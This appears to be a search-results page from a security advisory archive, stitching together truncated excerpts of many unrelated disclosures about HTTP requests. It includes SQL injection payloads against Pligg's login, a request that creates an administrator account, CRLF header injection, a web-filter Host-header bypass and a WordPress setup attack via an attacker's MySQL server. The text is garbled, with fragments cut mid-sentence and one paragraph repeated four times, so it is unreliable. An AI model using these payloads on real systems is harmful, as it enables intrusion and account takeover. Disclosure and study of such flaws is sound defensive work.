Next Page >>
POST request
Subject: eyeOS checksum prediction
Author: Andrej Komarov (komarov@itdefence.ru)
eyeOS operates with special intermediate checksums in plaintext. Without its validation it is impossible to make new actions (to login, start new services). There is way to predict eyeOS checksum. If it is automated from hackers side, it will make local Denial Of Service atack or user password stealing.
1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
/* Post Request */
processlogin=3&username=-99' UNION SELECT
1,2,3,4,5,6,null,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*
/* Get Request */
/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users
WHERE user_id=1/*&confirmationcode=1
---[ cvote.php ]------------------------------------------------
/* Post Request */
7) Known vulnerabilities:
CVE ID Disclosed Title
CVE-2000-1038 12/11/2000 The web administration interface for IBM AS/400
Firewall allows remote attackers to cause a denial of service via an
empty GET request.
CVE-2002-1731 12/31/2002 The System Request menu in IBM AS/400 allows
local users to list valid user accounts by viewing the object names that
are type USRPRF.
CVE-2005-0868 05/02/2005 AS/400 Telnet 5250 terminal emulation clients,
as implemented by (1) IBM client access, (2) Bosanova, (3) PowerTerm,
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
----------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
The server encountered an internal error while processing this request."
Here is the access log fragment of this request (I tried it
multiple times):
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:02:12 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:02:13 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:12 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
Still wrong, No DoS. The server responds to further requests, after the dialog box appears:
192.168.1.5
hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866
It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
SQL query:
SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, In the original report, only version 5.2 of the
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at <badchars> Port 80</address>
</body></html>
as new lines, to be injected into requests directed at application
servers.
For instance, if an attacker were to send the following simple request:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
The web server proxy module would instead send a request on to the
application server which looks more like:
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.
/-----
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> I found a vulnerability in McAfee Web Gateway 7 that allows access to
> filtered sites.
> The appliance believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
>
> It is blocked.
>
lines query and latest version of MySQL doesn't allow to start comment with /* no followed by a */, sometimes
It's impossible to alter the 'users' table content for e.g. changing the admin's password, but is still
possible to inject a subquery to fetch for e.g. the session id of admin for a Session Hijacking attack.
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
A DoS vulnerability exists in NetCache proxies of at least some areas
of Speedy Argentina ISP (201.255.64/18), by which a URL could be rendered
inaccessible by means of the prefetch cache control directive.
The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.
It is worth noting that this attack affects the URL EXACTLY. For
functionality for users to store, for example, contact information,
notes, a journal or files. A search form can be used to search for such
stored items.
When users search, for example, for certain files, using the provided
search form, an HTTP POST request containing the search query in XML
form is sent from the browser to the PHP script at
https://example.com/webmail/server/webmail.php:
----- HTTP POST request ------------------------------------------------
<iq sid="73aaafec4a8db27af49c4c43bca4ac13"
phpMyAdmin cookie and the value of 'token', which appears in the response
body:
Request
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
-tom-
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
sequences (and declaring same as invalid sequences) in January 1998. Such
Security Considerations were not discussed in the preceding RFC 2044 [12]
published October 1996.
Limiting consideration for the moment to the original vulnerability report
and the HTTP/1.1 URI syntax, it becomes immediately clear that; HTTP/1.1
does not specify an encoding for the URI (RFC 2616 [13] and RFC 2396 [14])
and treats it as a octet stream known to the client and origin server, and
otherwise transparent to intervening proxies. Specific characters in the
HTTP URI are significant, all of them within the US-ASCII character set
(which is a deliberate subset of UTF-8 and the first 128 code points of
I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
It is blocked.
> I found a vulnerability in McAfee Web Gateway 7 that allows access to
> filtered sites.
> The appliance believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
>
> It is blocked.
>
Vulnerability description:
--------------------------
1) An attacker is able to access the administration interface from the WLAN by
manipulating the "Host:" header and Request-URI in the HTTP GET request to the
proxy server running on the AMG-2000. It is possible to specify arbitrary IP
addresses (such as 127.0.0.1 or IPs from the internal network of the
management "private LAN" port) which an attacker is then able to access. The
squid proxy runs on port 2128 by default on the AMG-2000.
ClientCert-Subject: C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userY
Upon injecting the attacker-supplied HTTP headers the application
would receive an HTTP request similar to that shown below:
POST /targetapp HTTP/1.1
Content-Type: text/xml; charset=utf-8
ClientCert-Subject: C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userY
ClientCert-Subject-CN: CN=userY
Host: test.vsecurity.com
Content-Length: 1024
This is the firefox user agent string...
>
>
> ============================================================
> !discussion
> The Partial GET Request (HTTP 206 Status Code) of a WAV file
> results in a Denial of Service of the application.
>
> Last HTTP packet from Firefox before the DoS is listed below
> in RAW format:
> GET /fpaudio/footprints_waves.wav HTTP/1.1
(.NET CLR 3.5.30729)
============================================================
============================================================
!discussion
The Partial GET Request (HTTP 206 Status Code) of a WAV file
results in a Denial of Service of the application.
Last HTTP packet from Firefox before the DoS is listed below
in RAW format:
GET /fpaudio/footprints_waves.wav HTTP/1.1
http://www.fortinet.com/products/fortiweb/index.html
2) Description of the Findings
BINAR10 has found a policy bypass occurrence when large size data is sent in
POST (data) or GET request.
3) Technical Details
3.1. POST Request Example
Next Page>>
|
